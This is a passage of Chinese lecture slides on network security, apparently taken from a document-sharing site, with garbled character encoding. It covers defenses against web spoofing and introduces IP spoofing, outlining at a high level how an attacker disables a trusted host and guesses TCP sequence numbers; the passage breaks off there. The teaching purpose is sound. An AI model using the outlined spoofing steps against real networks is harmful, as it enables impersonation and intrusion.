3.必須知道Session變量以及它的限制條件2023/2/387Web欺騙的防御防范Web欺騙的方法:配置網(wǎng)絡瀏覽器使它總能顯示目的URL,并且習慣查看它。檢查源代碼,如果發(fā)生了URL重定向,就一定會發(fā)現(xiàn)。不過,檢查用戶連接的每一個頁面的源代碼對普通用戶來說是不切實際的想法。使用反網(wǎng)絡釣魚軟件。禁用JavaScript、ActiveX或者任何其他在本地執(zhí)行的腳本語言。確保應用有效和能適當?shù)馗櫽脩簟o論是使用cookie還是會話ID,都應該確保要盡可能的長和隨機。培養(yǎng)用戶注意瀏覽器地址線上顯示的URL的好習慣。培養(yǎng)用戶的安全意識和對開發(fā)人員的安全教育。Web欺騙攻擊Web欺騙的防護很隱蔽,不容易被發(fā)現(xiàn)預防手段禁止瀏覽器中的JavaScript功能確保瀏覽器的連接狀態(tài)是可見的時刻注意所點擊的URL鏈接會在位置狀態(tài)行中得到正確的顯示第7章第3節(jié)Ip欺騙2023/2/390在Internet上計算機之間相互進行的交流建立在兩個前提之下:認證(Authentication)信任(Trust)2023/2/391認證:

認證是網(wǎng)絡上的計算機用于相互間進行識別的一種鑒別過程,經(jīng)過認證的過程,獲準相互交流的計算機之間就會建立起相互信任的關系。2023/2/392信任:

信任和認證具有逆反關系,即如果計算機之間存在高度的信任關系,則交流時就不會要求嚴格的認證。而反之,如果計算機之間沒有很好的信任關系,則會進行嚴格的認證。2023/2/393欺騙實質(zhì)上就是一種冒充身份通過認證騙取信任的攻擊方式。攻擊者針對認證機制的缺陷,將自己偽裝成可信任方,從而與受害者進行交流,最終攫取信息或是展開進一步攻擊。IP欺騙攻擊IP欺騙的基礎通過偽造IP地址能夠獲得更過的收益或者權限偽造的IP地址可以被接受而不被發(fā)現(xiàn)第7章第4節(jié)IP欺騙攻擊IP欺騙的過程信任SYNxSYNy+ACKx+1ACKy+1第7章第4節(jié)IP欺騙攻擊IP欺騙的過程首先使被信任主機的網(wǎng)絡暫時癱瘓連接到目標機的某個端口來猜測ISN基值

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經(jīng)權益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
  • 6. 下載文件中如有侵權或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論